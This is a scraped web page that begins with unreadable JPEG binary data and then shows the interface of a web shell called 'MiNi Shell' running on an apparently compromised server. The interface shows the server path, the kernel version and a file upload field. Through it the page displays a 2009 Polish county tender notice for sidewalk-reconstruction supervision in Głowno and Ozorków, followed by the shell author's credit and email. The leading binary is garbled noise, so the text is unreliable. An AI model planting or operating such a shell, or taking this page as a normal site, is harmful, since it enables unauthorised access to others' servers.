JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090525/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090525/79739-N-2009.html

<p class="kh_header"><b>Zgierz: Pełnienie funkcji inspektora nadzoru nad zadaniem pn. Przebudowa chodnika 
w drodze powiatowej Nr 5101 E- ul. Sikorskiego w Głownie oraz nad zadaniem pn. Przebudowa chodnika w drodze powiatowej Nr 5173 E - Al. Wyszyńskiego 
w Ozorkowie - 2 zadania</b><br>
<b>Numer ogłoszenia: 79739 - 2009; data zamieszczenia: 25.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Zgierskiego , ul. Sadowa 6A, 95-100 Zgierz, woj. łódzkie, tel. 042 7190885, faks 042 7190816.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.zgierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem pn. Przebudowa chodnika 
w drodze powiatowej Nr 5101 E- ul. Sikorskiego w Głownie oraz nad zadaniem pn. Przebudowa chodnika w drodze powiatowej Nr 5173 E - Al. Wyszyńskiego 
w Ozorkowie - 2 zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru nad przebudową chodnika w drodze powiatowej Nr 5101 E- ul. Sikorskiego w Głownie oraz nad zadaniem pod nazwą Przebudowa chodnika w drodze powiatowej Nr 5173 E - 
Al. Wyszyńskiego w Ozorkowie - 2 zadania.

Zamawiający dopuszcza składanie ofert częściowych, gdzie część (zadanie) stanowi:

Zadanie Nr 1
Temat: Pełnienie funkcji inspektora nadzoru nad zadaniem 
pn. Przebudowa chodnika w drodze powiatowej Nr 5101 E - ul. Sikorskiego 
w Głownie. 

Zadanie Nr 2
Temat: Pełnienie funkcji inspektora nadzoru nad zadanie pn. Przebudowa chodnika w drodze powiatowej Nr 5173 E - Al. Wyszyńskiego w Ozorkowie.

Wykonawca może złożyć ofertę na jedną lub więcej części zamówienia.
Części nie mogą być dzielone przez Wykonawców, oferty nie zawierające pełnego zakresu przedmiotu zamówienia określonego w zadaniu częściowym zostaną odrzucone.

Zamawiający informuje, że nie dopuszcza możliwości składania ofert wariantowych, nie zawiera umowy ramowej i nie ustanawia dynamicznego systemu zakupów, nie stosuje aukcji elektronicznej oraz nie przewiduje możliwości udzielenia zamówienia uzupełniającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi zostać zabezpieczona wadium w wysokości: 
1)	dla zadania częściowego nr 1: 800.00 PLN (słownie: osiemset złotych, 00/100 PLN),
2)	dla zadania częściowego nr 2: 1000,00 PLN (słownie:  jeden tysiąc złotych, 00/100 PLN)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy biorący udział w postępowaniu muszą spełnić następujące warunki:

1	Sytuacja podmiotowa wykonawcy
Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych
2	Zdolność techniczna
Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana metodą spełnia niespełna na podstawie przedłożonych przez Wykonawcę dokumentów
 i oświadczeń składających się na ofertę. Nie spełnienie któregokolwiek ze wskazanych wyżej warunków i wymogów skutkować będzie wykluczeniem Wykonawcy z udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty należy dołączyć następujące dokumenty i oświadczenia:

1	Aktualny odpis z właściwego rejestru	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert	
2	Potwierdzenie posiadanych uprawnień
Wykaz osób uczestniczących 
w wykonywaniu zamówienia którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności.
UWAGA: 
Wykonawcy oferujący wykonanie zadania Nr 1 i zadania Nr 2 opracowują przedmiotowy załącznik odrębnie dla każdego zadania. 	Wymagane dysponowanie osobami: które będą wykonywać zamówienie, posiadającymi uprawnienia do nadzorowania i kierowania robotami budowlanymi w specjalności konstrukcyjno-inżynieryjnej w zakresie budowy dróg - minimum 1 osoba; Do wykazu należy załączyć dokumenty stwierdzające, że wskazane przez Wykonawcę osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają uprawnienia budowlane  - drogowe w specjalności konstrukcyjno - inżynieryjnej 
w zakresie budowy dróg (zgodnie z art. 12 ust. 1 i 2 ustawy - Prawo budowlane)wystawione przez podmioty uprawnione  oraz aktualne zaświadczenie o przynależności tych osób do Okręgowej Izby Inżynierów Budowlanych.

3	Zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób uczestniczących w wykonywaniu zamówienia wykonawca wskazał osoby, którymi będzie dysponował	 
4	Oświadczenie z art. 22 i 24	Oświadczenie z art. 22 i 24	
	
Zakres usług zlecanych podwykonawcom
UWAGA: 
Wykonawcy oferujący wykonanie zadania Nr 1 i zadania Nr 2 opracowują przedmiotowy załącznik odrębnie dla każdego zadania.	Oświadczenie w którym Wykonawca określi zakres usług zlecanych ewentualnym podwykonawcom 	

Wskazane dokumenty mogą być doręczone w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów.
Jeżeli w określonym terminie Wykonawca nie złoży oświadczeń lub dokumentów, 
o których mowa w art. 25 ust. 1 ustawy Prawo Zamówień Publicznych, lub pełnomocnictw albo jeżeli złoży oświadczenia i dokumenty, o których mowa w art. 25 ust. 1 ustawy Prawo Zamówień Publicznych, zawierające błędy lub wadliwe pełnomocnictwa, Zamawiający wezwie go do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy będzie podlegać odrzuceniu albo konieczne będzie unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny spełniać warunki określone w art. 26 ust. 3 art. ustawy Prawo Zamówień Publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655, z późn. zm.). Zamawiający może także w wyznaczonym przez siebie terminie, wezwać do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaję się dokumentów, o których mowa w pkt 1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Szczegółowe wymagania formalne, jakie powinny spełniać dokumenty, o których mowa w pkt 
1 zostały określone w rozporządzeniu Prezesa Rady Ministrów z dnia 19 maja 2006r. 
w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, 
w jakich te dokumenty mogą być składane..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.starostwo.zgierz.pl/przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ -4,80 zł + 5,80 zł koszty wysyłki można odebrać w siedzibie Zamawiającego 
w godzinach od 8:00-16:00 pok. 318 lub za zalicz. poczt. Nr faksu dla zamówienia 0427175484.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2009 godzina 10:00, miejsce: Oferty należy składać w Starostwie Powiatowym w Zgierzu; 95-100 Zgierz, 
ul. Sadowa 6Aw pok. 112 - Kancelaria.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem 
pn. Przebudowa chodnika w drodze powiatowej 
Nr 5101 E - ul. Sikorskiego w Głownie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru nad przebudową chodnika w drodze powiatowej Nr 5101 E - ul. Sikorskiego 
w Głownie.
Charakterystyka nadzorowanej inwestycji:
Przedmiotem zamówienia są roboty budowlane obejmujące przebudowę drogi powiatowej Nr 5101 E - ul. Sikorskiego w Głownie, a w szczególności: 
1)	rozbiórka elementów: 
a.	rozebranie obrzeży 100 x 30 x 8 - 4700,00 m,
b.	rozebranie chodników z płyt betonowych 50 x 50 x 7- 3.546,00 m2,
c.	rozebranie nawierzchni z trylinki, na zjazdach 2000,00 m2.
2)	ustawienie betonowego obrzeża chodnikowego o wymiarach 30 x 8 cm na podsypce cementowo - piaskowej, z wypełnieniem spoin zaprawą cementową, na długości 4700,00 m, 
3)	wykonanie chodnika z brukowej kostki betonowej grubości 6 cm  na podsypce cementowo - piaskowej, z wypełnieniem spoin piaskiem, na powierzchni 3546,00 m2,
4)	wykonanie i wyprofilowanie koryta, 
a.	na zjazdach, na powierzchni 2000,00 m2 , 
b.	na ścieżce rowerowej, na powierzchni 1500,00 m2
5) wykonywanie podbudowy  z kruszywa łamanego stabilizowanego  mechanicznie gr. 15 cm, na zjazdach, na powierzchni 2000,00 m2, 
6) wykonanie powierzchni z kostki brukowej betonowej, gr. 8 cm  na podsypce cementowo - paskowej wypełnieniem spoin piaskiem na zjazdach: kostka kolorowa na powierzchni 2000,00 m2, na ścieżce rowerowej: kostka szara na powierzchni 1500,00 m2,
7) założenie i pielęgnacją zieleni drogowej, na powierzchni 580,00 m2, 
8) wykonanie regulacji pionowej studzienek dla urządzeń podziemnych.
Szczegółowe wymagania dotyczące realizacji roboty budowlanej zawarte są 
w Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych wymienionych poniżej:
Ogólnych Specyfikacjach Technicznych:
1)	OST- Wymagania ogólne, 
2)	OST- Zieleń Miejska,
3)	OST- Chodniki z kostki,
4)	OST -Koryto,
5)	OST- Obrzeża,
6)	OST - Podbudowa, 
7)	OST - Regulacja studzienek,
8)	OST- Roboty pomiarowe,
9)	OST- Rozbiórka,
10)	OST - Wjazdy i wyjazdy.

Szczegółowych Specyfikacjach technicznych:
1)	SST-1- Roboty pomiarowe,
2)	SST-2- Rozbiórka,
3)	SST-3- Obrzeża,
4)	SST-4- Chodniki z kostki,
5)	SST-5- Koryto,
6)	SST-6- Podbudowa na wjazdach,
7)	SST-7 -Kostka na zjazdach i ścieżce,
8)	SST-8- Zieleń drogowa,
9)	SST-9- Studzienki.

Zamówienie musi zostać zrealizowane w terminie:
Od dnia przekazania Wykonawcy robót budowlanych terenu budowy.
Do dnia zakończenia i odbioru wszystkich robót objętych przedmiotem zamówienia oraz przekazania do użytkowania nadzorowanych inwestycji oraz w okresie trwania gwarancji tj. 
36 miesięcy licząc od dnia następującego po dniu ostatecznego odbioru ostatniej oddanej do odbioru roboty budowlanej objętej nadzorem inwestorskim.
- dla zadania częściowego: 1.
W związku z problemami technicznymi w pkt 4) wskazano termin zakończenia robót budowlanych objętych nadzorem inwestorskim..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji inspektora nadzoru nad zadanie pn. Przebudowa chodnika w drodze powiatowej Nr 5173 E - Al. Wyszyńskiego w Ozorkowie..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru nad zadaniem pn. Przebudowa chodnika w drodze powiatowej Nr 5173 E - Al. Wyszyńskiego 
w Ozorkowie.
Charakterystyka nadzorowanej inwestycji:
Przedmiotem zamówienia są roboty budowlane obejmujące przebudowę drogi powiatowej Nr 5173 E w pasie drogowym Al. Wyszyńskiego w Ozorkowie. 
W skład robót wchodzą roboty budowlane polegające na:
1)	oodtworzeniu trasy drogowej i jej punktów wysokościowych przy liniowych robotach ziemnych na długości 700 m, w pasie drogowym 
Al. Wyszyńskiego w Ozorkowie,
2)	rozebraniu krawężników 100 x 30 x 15 na długości 1400,00 m,
3)	rozebraniu obrzeży 100 x 30 x 8 na długości 5000,00 m,
4)	rozebraniu chodników z płyt betonowych 50 x 50 x 7 na powierzchni 4800,00 m2,
5)	rozebranie nawierzchni z trylinki, na zjazdach o powierzchni 2500,00  m2, w pasie drogowym Al. Wyszyńskiego w Ozorkowie,
6)	ustawieniem krawężników betonowych wystających o wymiarach 20 x 30 cm z wykonaniem ław betonowych z oporem, na podsypce cementowo - piaskowej na długości 1400,00 m, w pasie drogowym Al. Wyszyńskiego w Ozorkowie,
7)	wykonanie i wyprofilowanie koryta na zjazdach, na powierzchni 2500,00 m2, na deptaku na powierzchni 4800,00 m2, w pasie drogowym Al. Wyszyńskiego 
w Ozorkowie,
8)	ustawieniu betonowego obrzeża chodnikowego o wymiarach 30 x 8 cm na podsypce cementowo - piaskowej, z wypełnieniem spoin zaprawą cementową na długości 5 000,00 m, w pasie drogowym Al. Wyszyńskiego w Ozorkowie,
9)	wykonaniu nawierzchni z brukowej kostki betonowej szarej typu starobruk grubości 6 cm, na podsypce cementowo - piaskowej, z wypełnieniem spoin piaskiem, na chodniku i deptaku, z wyprofilowaniem spadków nawierzchni w kierunku istniejących kratek ściekowych na powierzchni 7500,00 m2, w pasie drogowym Al. Wyszyńskiego w Ozorkowie,
10)	wykonaniu zjazdów z kostki brukowej betonowej, gr. 8 cm, grafitowej typu starobruk, na podsypce cementowo - piaskowej z wypełnieniem spoin piaskiem, na powierzchni 2500,00 m2, w pasie drogowym Al. Wyszyńskiego 
w Ozorkowie,
11)	założeniu i pielęgnacji zieleni drogowej, na powierzchni 6 000,00 m2, 
w pasie drogowym Al. Wyszyńskiego w Ozorkowie,
12)	wykonaniu regulacji pionowej studzienek dla urządzeń podziemnych w pasie drogowym Al. Wyszyńskiego w Ozorkowie,
Szczegółowe wymagania dotyczące realizacji roboty budowlanej zawarte są w Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych wymienionych poniżej:
Ogólnych Specyfikacjach Technicznych:
1)	OST- Wymagania ogólne D - M - 00.00.00,
2)	OST- Roboty przygotowawcze D - 01.00.00,
3)	OST- Rozbiórka elementów dróg, ogrodzeń i przepustów D-01.02.04,
4)	OST -Krawężniki betonowe D-08.01.01,
5)	OST- Koryto  wraz  z  profilowaniem i  zagęszczaniem  podłoża 
D-04.01.01, 
6)	OST - Betonowe  obrzeża  chodnikowe D - 08.03.01,
7)	OST - Chodniki D - 08.02.00,
8)	OST- Podbudowy  z  kruszywa stabilizowanego  mechanicznie 
D - 04.04.00 ¸ 04.04.03,
9)	OST- Wjazdy  i  wyjazdy  z  bram D - 08.04.01,
10)	OST - Zieleń drogowa D - 09.01.01,
11)	OST - Regulacja pionowa uszkodzonej studzienki kanalizacyjnej 
D - 03.02.01a.
Szczegółowych Specyfikacjach technicznych:
1)	SST-1- Odtworzenie trasy i punktów wysokościowych D-01.01.01,
2)	SST-2-Rozbiórka elementów dróg D-01.02.04,
3)	SST-3- Krawężniki betonowe D-08.01.01, 
4)	SST-4- Koryto wraz z profilowaniem i zagęszczaniem podłoża D-L-04.01.01,
5)	SST-5- Betonowe obrzeża chodnikowe D-08.03.01,
6)	SST-6- Chodniki z brukowej kostki betonowej D-08.02.02,
7)	SST-7 -Podbudowa z kruszywa łamanego stabilizowanego mechanicznie D-04.04.02,
8)	SST-8- Wjazdy i wyjazdy z bram D - 08.04.01
9)	SST-9- Zieleń drogowa D-09.01.01,
10)	SST-10-Regulacja pionowa uszkodzonej studzienki kanalizacyjnej 
       D-03.02.01a.

Od dnia przekazania Wykonawcy robót budowlanych terenu budowy.
Do dnia zakończenia i odbioru wszystkich robót objętych przedmiotem zamówienia oraz przekazania do użytkowania nadzorowanych inwestycji oraz w okresie trwania gwarancji tj. 
36 miesięcy licząc od dnia następującego po dniu ostatecznego odbioru ostatniej oddanej do odbioru roboty budowlanej objętej nadzorem inwestorskim.
. - dla zadania częściowego: 2
W związku z problemami technicznymi w pkt 4) wskazano termin realizacji robót budowlanych objętych nadzorem inwestorskim..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com